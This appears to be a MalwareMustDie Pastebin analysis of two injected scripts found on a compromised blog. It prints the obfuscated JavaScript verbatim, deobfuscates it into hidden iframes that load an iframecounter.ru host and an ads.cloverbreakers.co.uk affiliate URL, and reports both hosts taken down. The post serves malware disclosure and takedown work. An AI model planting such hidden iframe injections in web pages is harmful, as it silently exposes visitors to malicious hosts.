Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie
- #Case: Double injection by infector and traffer
- # unixfreaxjp | Feb 22th
- /--- target ---/
- http://blog.la-pur.com/
- /---- double obs ----/
- <script language="javascript" type="text/javascript">var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1<=k1.length-1){h=h+String.fromCharCode(k1.charCodeAt(t1++)-3);}h=h+'bdicczzazbzbeb';while(t2<=k2.length-1){h=h+String.fromCharCode(k2.charCodeAt(t2++)-2);}document.write(h);</script><body> <script type="text/javascript">var xtgdxi = "%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0064%u0073%u002e%u0063%u006c%u006f%u0076%u0065%u0072%u0062%u0072%u0065%u0061%u006b%u0065%u0072%u0073%u002e%u0063%u006f%u002e%u0075%u006b%u002f%u0061%u0066%u0066%u0069%u006c%u0069%u0061%u0074%u0065%u002e%u0070%u0068%u0070%u003f%u0070%u0069%u0064%u003d%u0030%u0064%u0035%u0030%u0034%u0064%u0032%u0063%u0034%u0033%u0035%u0034%u0032%u0066%u0037%u0033%u0037%u0065%u0061%u0032%u0033%u0036%u0037%u0033%u0062%u0037%u0065%u0034%u0032%u0038%u0063%u0039"; var pzgek = document.createElement("iframe"); pzgek.style.width = "10px"; pzgek.style.height = "10px"; pzgek.style.border = "0px"; pzgek.frameBorder = "0"; pzgek.setAttribute("frameBorder", "0"); document.body.appendChild(pzgek); pzgek.src = unescape(xtgdxi);</script> </body>
- /--- 書き直したら ---/
- <script language="javascript" type="text/javascript">
- var k1 = '?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',
- k2 = '0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',
- t1 = 0,
- t2 = 0,
- h = '';
- while (t1 <= k1.length - 1) {
- h = h + String.fromCharCode(k1.charCodeAt(t1++) - 3);
- }
- h = h + 'bdicczzazbzbeb';
- while (t2 <= k2.length - 1) {
- h = h + String.fromCharCode(k2.charCodeAt(t2++) - 2);
- }
- document.write(h);
- /--- deobfs ----/
- <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src=
- "http://bdicczzazbzbeb.users.iframecounter.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
- marginwidth=0 marginheight=0 scrolling=no></iframe></div>
- /--- second obs --/
- var xtgdxi = "%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0064%u0073%u002e%u0063%u006c%u006f%u0076%u0065%u0072%u0062%u0072%u0065%u0061%u006b%u0065%u0072%u0073%u002e%u0063%u006f%u002e%u0075%u006b%u002f%u0061%u0066%u0066%u0069%u006c%u0069%u0061%u0074%u0065%u002e%u0070%u0068%u0070%u003f%u0070%u0069%u0064%u003d%u0030%u0064%u0035%u0030%u0034%u0064%u0032%u0063%u0034%u0033%u0035%u0034%u0032%u0066%u0037%u0033%u0037%u0065%u0061%u0032%u0033%u0036%u0037%u0033%u0062%u0037%u0065%u0034%u0032%u0038%u0063%u0039";
- var pzgek = document.createElement("iframe");
- pzgek.style.width = "10px";
- pzgek.style.height = "10px";
- pzgek.style.border = "0px";
- pzgek.frameBorder = "0";
- pzgek.setAttribute("frameBorder", "0");
- document.body.appendChild(pzgek);
- pzgek.src = unescape(xtgdxi);
- / cracks /
- var xtgdxi = "%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0061%u0064%u0073%u002e%u0063%u006c%u006f%u0076%u0065%u0072%u0062%u0072%u0065%u0061%u006b%u0065%u0072%u0073%u002e%u0063%u006f%u002e%u0075%u006b%u002f%u0061%u0066%u0066%u0069%u006c%u0069%u0061%u0074%u0065%u002e%u0070%u0068%u0070%u003f%u0070%u0069%u0064%u003d%u0030%u0064%u0035%u0030%u0034%u0064%u0032%u0063%u0034%u0033%u0035%u0034%u0032%u0066%u0037%u0033%u0037%u0065%u0061%u0032%u0033%u0036%u0037%u0033%u0062%u0037%u0065%u0034%u0032%u0038%u0063%u0039";
- var pzgek = unescape(xtgdxi);
- document.write(pzgek);
- / デコード /
- http://ads.cloverbreakers.co.uk/affiliate.php?pid=0d504d2c43542f737ea23673b7e428c9
- /-- target list ---, whats this? ---/
- http://ads.cloverbreakers.co.uk/affiliate.php?pid=0d504d2c43542f737ea23673b7e428c9 // TANGO DOWN
- http://bdicczzazbzbeb.users.iframecounter.ru/?s=1 // TANGO DOWN
- #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement